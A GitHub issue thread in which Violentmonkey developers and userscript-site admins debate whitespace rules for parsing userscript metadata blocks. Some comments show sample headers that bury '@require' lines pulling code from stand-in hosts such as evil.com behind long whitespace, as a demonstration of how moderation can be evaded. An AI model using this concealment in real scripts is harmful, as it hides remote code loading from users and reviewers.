### ISSUE TITLE
Metadata parser cannot recognize a userscript

### ISSUE THREAD

**Issue by tophf** [violentmonkey/violentmonkey#610]
Press the new script button and paste this:
```js
// ==UserScript==//
// @name     a
// ==/UserScript==
```

Expected: The script is recognized and saved
Observed: `Invalid script` is displayed; it's not saved

---

As you can see there's a `//` after `==UserScript==` but VM incorrectly expects a whitespace there although other managers (TM, GM) don't. There's also no such requirement in the [GM wiki](https://wiki.greasespot.net/Metadata_Block).

P.S. On the other hand, [this regexp used by VM](https://github.com/violentmonkey/violentmonkey/blob/master/src/injected/web/index.js#L188) has `\/\/\s+==` which is too lax: it will allow linebreaks which is definitely wrong so `[\t\x20]+` should be used instead, AFAICT.

---

### Environment
- Browser: Chrome
- Browser version: 74, 79
- Violentmonkey version: 2.11.2
- OS: Windows

**Comment by tophf** [comment]
GM wiki is quite restrictive by the way, unlike Tampermonkey:

>Note that the opening // ==UserScript== and closing // ==/UserScript== must be precisely at the beginning of its line.

At first, it might seem reasonable but in real world people can add or remove a space as it's not something bad from a human point of view. Moreover it's not like GM still holds some kind of authority over userscripts. So I suggest to keep being more forgiving about these spaces and thus more human-friendly (similarly to TM which isn't opinionated about these things either).

**Comment by gera2ld** [comment]
I agree. The spaces were supported since some earlier release.

Some tools (like rollup) may wrap everything in an IIFE with indent of 2 spaces, so it's quite reasonable to allow those spaces in a comment block.

**Comment by Martii** [comment]
@gera2ld 

> The spaces were supported since some earlier release.

Since when? I've been with GM since nearly the beginning and never seen this. I also have worked with just about every .user.js engine out there *(save for a few)*.

@tophf 

> `// ==UserScript==//`

Will never, and should not, be parsed properly and rejected on most hosting sites, including ours, since it's not a real UserScript. If VM wishes to define their own standard for their editor that is fine but then it no longer becomes an actual UserScript and should probably be named something else.

> Moreover it's not like GM still holds some kind of authority over userscripts.

Yes but AMO and the Chrome Web Store do for publishing an AO/Extension. If a .user.js gets a complaint then it'll be yanked for potential security review. As far as OUJS goes more rejections will probably happen regarding improperly formatted keys.  I don't actually care that you are challenging the standards but they exist for many reasons. Trying to circumvent the protections offered by the UserScript metadata block is not a wise thing to do. I realize your trailing "re-comment" is benign but you are messing with other preprocessors/parsers out there and may break things.

Related to: Once the browsers enforce the corresponding API's and all the .user.js engine must conform this might lead to VM being unusable for whatever reason.

Cc: @jasonbarnabe

**Comment by Martii** [comment]
> As you can see there's a `//` after `==UserScript==` but VM incorrectly expects a whitespace there although other managers (TM, GM) don't.

I see that in current GM4... so either the greasespot wiki is too strict or the peg/RegEx is incorrect. :\ @arantius Is the serialization not caring if someone does the example @tophf [gave above](https://github.com/violentmonkey/violentmonkey/issues/610#issue-497354796)? Going back historically it seems like it's a fuzzy point that could use your expertise on clarification. Thanks for a moment of your time.

**Comment by arantius** [comment]
https://github.com/greasemonkey/greasemonkey/blob/b582ae8576c7180cd192415c99358fa8a71cd6f9/src/parse-user-script.js#L3

Surely unintentional but you can put anything anywhere between the two ==UserScript== lines (except between newline and the the ==/ line).  PEG only handles the individual lines between them (the stuff captured by the group), and we ignore lines it doesn't parse (like "//\n").

**Comment by Martii** [comment]
@arantius 

Thank you for that clarification.

@gera2ld Cc: @tophf 

That just leaves the change at https://github.com/violentmonkey/violentmonkey/pull/616/files#diff-613b4b57edd63244f56819530c405ab5R191 and https://github.com/violentmonkey/violentmonkey/pull/616/files#diff-96f4606baf55a152a42fd6ee522131d7R54

i.e. `//<tabchar>==UserScript` ... from `\/\/[\t\x20]*==UserScript==`:

``` js
//	==UserScript==
// @name     a
// @license  MIT
// @include https://example.com/*
// ==/UserScript==

alert('Hello, World!');
```
... will be rejected on OUJS and GM4, and presumably TM, will run the script on every page because it won't find the UserScript metadata block and presume the defaults... thus creating a security issue from our vantage point in which we trap.

**Comment by tophf** [comment]
Apparently everyone except TM implemented the metadata parser using a single hardcoded space between `//` and `==UserScript==`, [including Chromium/Chrome](https://cs.chromium.org/chromium/src/extensions/browser/user_script_loader.cc?l=74&rcl=c6841bac966aceff132fa2765a992fcd88e954b2). Hardcoding the amount of spaces, especially inside a comment, seems totally anti-human to me, but since this is how it's done almost everywhere I guess we should do it here in VM as well.

**Comment by gera2ld** [comment]
@Martii Spaces at the beginning are allowed since v2.9.5 (b5f161c4). So the following is parsed in VM as well as in TM:

```js
(function () {
  // ==UserScript==
  // @name some script
  // ==/UserScript==
})();
```

I think it acceptable to support such cases at the moment since they are already supported in some other parsers and seems to be widely used.

But in the long term it might be wrong to support some strange syntax just because another parser has supported it unintentionally. Perhaps we need to improve the definition to make it stricter and more human-friendly, and deprecate those unexpected but accidentally-supported syntax in the future.

**Comment by Martii** [comment]
I had the "pleasure", and share of, reading a lot of scripts on USO that were formatted *similarly* to the indentation levels allowed like this *(this is just an example of one that doesn't do this but could. Nothing harmful in it but perhaps a bad `@require` could be inserted and buried deep in a huge, long, list that has a lot of `@include`/`@match` keys)*:

``` js
// ==UserScript==
																															// @name           AdsBypasser
																				// @namespace      AdsBypasser
																																					// @description    Bypass Ads
																															// @copyright      2012+, Wei-Cheng Pan (legnaleurc)
																																									// @version        5.55.0
																																																							// @license        BSD
																																																					// @homepageURL    https://adsbypasser.github.io/
																																																											// @supportURL     https://github.com/adsbypasser/adsbypasser/issues
																																																																// @updateURL      https://adsbypasser.github.io/releases/adsbypasser.meta.js
																																														// @downloadURL    https://adsbypasser.github.io/releases/adsbypasser.user.js
																																		// @icon           https://raw.githubusercontent.com/adsbypasser/adsbypasser/v5.55.0/img/logo.png
																																															// @grant          unsafeWindow
																																							// @grant          GM_xmlhttpRequest
																																																																// @grant			GM_addStyle
																																// @grant          GM_getResourceText
																																				// @grant          GM_getResourceURL
																																									// @grant          GM_getValue
																																													// @grant          GM_openInTab
																																				// @grant          GM_registerMenuCommand
																																																					// @grant          GM_setValue
																																														// @run-at         document-start
																							// @resource       alignCenter https://raw.githubusercontent.com/adsbypasser/adsbypasser/v5.55.0/css/align_center.css
																																													// @resource       scaleImage https://raw.githubusercontent.com/adsbypasser/adsbypasser/v5.55.0/css/scale_image.css
																																												// @resource       bgImage https://raw.githubusercontent.com/adsbypasser/adsbypasser/v5.55.0/img/imagedoc-darknoise.png
																																																				// @include        http://*
																																																				// @include        https://*
																																																								// ==/UserScript==
																																																								
alert('Is this readable off the bat? Scroll anyone?');
```

This wasn't very pretty to view in those sources esp. without a full width viewport or some other way of beautifying it *(which comes with its own issues)*. Usually these scripts were junk but not all of them. Some were test scripts others were just trying to confuse moderation.

I've thought about what you both said on this matter for years and even if we all supported multiple tabs/spaces:
* When should one stop in order to prevent really bad readability metadata blocks before having to resort to automation? 
* Could limit the number of symmetric indents *(find the "pre"-indent on `␣␣␣␣␣␣␣␣// ==UserScript==` and apply it to all. Using `␣` as a representation of a space character since markdown likes to not show spaces in code blocks)* but again how many? 
* How many spaces equals one tab? *(rhetorical question because it's been debated forever and everyone will give you a different answer)*. 
* What happens if there are spaces **and** tabs?
* How "nested" would one support this? *(callback "hell" comes to mind which was addressed with other syntax's and packages)*
* Recently over the last year the bundlers *(build routines)* also have introduced some quirks with moving comments. Working on those almost constantly to preserve things in our circles. Sticking to a minimal "standard" encourages mutual cooperation and collaboration I believe.



I appreciate all the feedback and I can relate with JSBeautify when comments get moved with the indentation. If I knew *(haven't looked recently)* how to disable that "feature" I probably would.

**Comment by tophf** [comment]
How serious are those problems in the comment above? I haven't seen all of the scripts in the world so I'd say those are edge cases and preventing them shouldn't be the primary goal. The "haxx0rz" will always find a way to defile things.

A userscript manager can easily show the parsed metadata info on installation/update in a separate UI and highlight the really sensitive parts like `@require` or `@resource` as well as `@matches` and friends.

**Comment by Martii** [comment]
> How serious are those problems in the comment above?

I can't release our logs, and we don't always monitor everything all the time, but a lot. The ones we do log constantly atm are .user.js and .js attempts. We get a lot of those attempts per month. Those get rejected if they don't end in .user.js and posted as a UserScript. In prior monitored metadata blocks attempts we had thousands of attempts... a lot are managed with validation now but not all. GF was taken down at least once from logging overflow, USO a lot of times that I lost count, and never, so far... knock on wood, with OUJS. Because of the UserScript metadata block standard those so called "edge cases" are completely wiped out with our filtering in the parser and beyond. We also get the usual *node* and dependency log lines as well that come through that are out of our control. Improving collaborative efforts is what I've learned over the last few years working with OUJS... which is why I'm here on occasion.

> preventing them shouldn't be the primary goal.

Administration duties aren't our number one goal. If automation with some minimal standards can serve to spend less time correcting "mistakes" the better the experience becomes without having burn-out *(or going dark as it sometimes called)* from our moderation. So I disagree.

> The "haxx0rz" will always find a way to defile things.

They can try. We learn from that if they succeed. Sometimes it's legitimate users showing us what kind of faults are found because they may not want to open an issue. Their motivation is known only to them for sure.

>  I haven't seen all of the scripts in the world...

Neither have I but I can tell you I've seen near 100% of USOs and near 100% of OUJS's scripts. Obviously there are updates to look at on active hosts. Nipping issues in the bud in a pre-op is much better than having to go back and fix everything *(maintenance)*.

> A userscript manager can easily show the parsed metadata info on installation/update in a separate UI and highlight the really sensitive parts

TM does that even better than GM/VM imho with diffs on install/updates.... however I'd rather not get a CVE/CERT *(takedown)* of OUJS or even GF for that matter. Jason has his way of doing things and we have our way of doing things... preferably with some level of safety and compatibility. I watch GF issues as well in case there's something critical that might have been missed and I would hope that GF would occasionally watch us. Same goes with all the known .user.js engines managers. I flip between them all in Firefox depending on what I need to re/test. Plus I train client on how to use UserScripts... some come from OUJS and others come from GF... some like Opera, some like Firefox, some like... you get the point... It's a diverse community as you know.

I almost mentioned this in the prior comment because I knew this point would be typed. That's what I mean by automation. I wrote [oujs - Meta View](https://openuserjs.org/scripts/Marti/oujs_-_Meta_View) immediately as my first duty when I joined OUJS and it's my primary script that I manage for the site for metadata blocks in case there are some weird, critical, entries. We also have other routines that can parse any keys but usually it's just easier to look at the source.

Anyhow... some stuff for you to nibble on perhaps. :smile:

**Comment by tophf** [comment]
Sounds convincing (I'm easily influenced though). Maybe then we should allow up to 8 spaces or 1 tab character to account for the automatically wrapped IIFE?

**Comment by Martii** [comment]
> Maybe then we should allow up to 8 spaces or 1 tab character to account for the automatically wrapped IIFE at the start of a metablock line?

That would be safer imho but getting everyone to adopt it would be difficult. Still could be "accordian'ed" abused but on a much smaller scale. :smile_cat: 

Quite honestly if the IIFE wrapper normalizes the keys/blocks then it could theoretically do a post-op of moving it back to the beginning of the lines... even if it's not "symmetrical and pretty". If you look at the GM classic article of Knowing Your Own Metadata, specifically https://sf.net/p/greasemonkey/wiki/Metadata_Block/#restructuring-with-gm_info you may notice that the last line in the function is optional cleanup. This would be a post-op to clean up memory storage for the gc. Also all the examples aren't indented at all for the UserScript metadata block. Things have changed quite a bit since those were written and I think the issue with the "unintentional" parsing probably exists there too but I haven't had time to go back and fix it yet since I read this issue. Usually OUJS is my primary concern and active duties.

**Comment by tophf** [comment]
OTOH, any restriction to the leading whitespace won't guard against this:
```js
// @require                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               https://evil.com/foo.js
```
In other words the requirement for `//` to be at the very beginning of a line doesn't improve security, and most likely it's implemented that way just because it was easier. It actually reminds me of how everyone coded in the late '80s when I learnt myself - hardcoding text positions in various templates was as common as floppy disks.

**Comment by Martii** [comment]
@tophf 

>  ... the requirement for `//` to be at the very beginning of a line doesn't improve security,

You probably won't be able to convince everyone that the idea of variable pre-key/comment indention is a good practice because it's usually not. Post key indention is questionable but with the pre-key format it signals "go look". Since the "length" of coding has been brought up *(e.g. "p\*ssing contest" catalyst ;)*, I as well as my mentor predates the 80's. We both think it's poor coding practice to allow pre-comment and pre-key indentation. I think you still might be missing the point though: ex.


``` js

// ==UserScript==

// @name The ultimate script, gotta have it, must have it

// Easy to spot that there should be something following this therefor scroll for sure to find it by any means

// @require                                                                                                                           https://evil.com/foo.js

// @license GPL-3.0-or-later

// Not easy to spot (readable) and forces everyone to scroll regardless plus it could be buried
                                                                                                                                                                                                                                                                                                                                                  // @require                                                                                  http://moreevil.com/bar.js
// with double-spacing to make it more hidden. So yes it is way more apparent that `// @require`, and related, be at the beginning and absolutely a single space between the comment and the @key

// Related to: if the site/.user.js engine manager doesn't give a scroll bar then how would one know to scroll to see the evilness.
                                                                                                                                                                                                                                                                                                                                                                                                                 // @require                                                                                                                                                                                                                                        http://ultimateevil.com/foobar.js
// @grant none

// ==/UserScript==
```

I had my share of seeing these kinds of scripts on USO as well... which is why I built Count Issues and installWith for that site when it was around. As Admin *(and Moderators should also apply this)* of OUJS I guarantee if something like this comes through the highest scrutiny on the script will be applied as it's part of our mission statement. :smile_cat:

**Comment by tophf** [comment]
My point was not the length of coding, certainly. The point was that I instantly recognize this practice of hardcoding text positions, which belongs to the ancient past when everyone's approach to parsing was inflexible, simplistic, and totally arbitrary. Hardcoding the position of a comment as well as the amount of spaces inside (`//` must be followed by exactly one space) is pretty much the essence of that lazy legacy approach. The security argument doesn't make a lot of sense especially since no one thought about limiting the amount of spaces after a `@key`. Moreover, 99.999% of users wouldn't understand if a script is malicious anyway even if they look at the code. You and me already agree that the proper way to is to parse and present this info in a readable form.
